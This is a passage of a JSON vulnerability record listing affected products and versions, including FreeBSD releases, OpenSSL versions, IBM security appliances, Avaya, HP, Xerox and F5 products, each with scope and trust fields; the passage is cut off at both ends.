0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72200" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system fc5022 16gb san scalable switch 7.2.1c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "qradar siem mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.0" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5855072.060.134.32804" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x33007382" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.2" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78300" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.13" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7955" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.08" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.015" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.5" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408738" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5875072.060.134.32804" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1.3" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9301072.180.134.32804" }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "enterprise linux load balancer eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58750" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.6" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35507914" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.9" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087330" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.3" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fc5022 16gb san scalable switch 7.3.0a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "89000" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2202585" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.6.4" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", 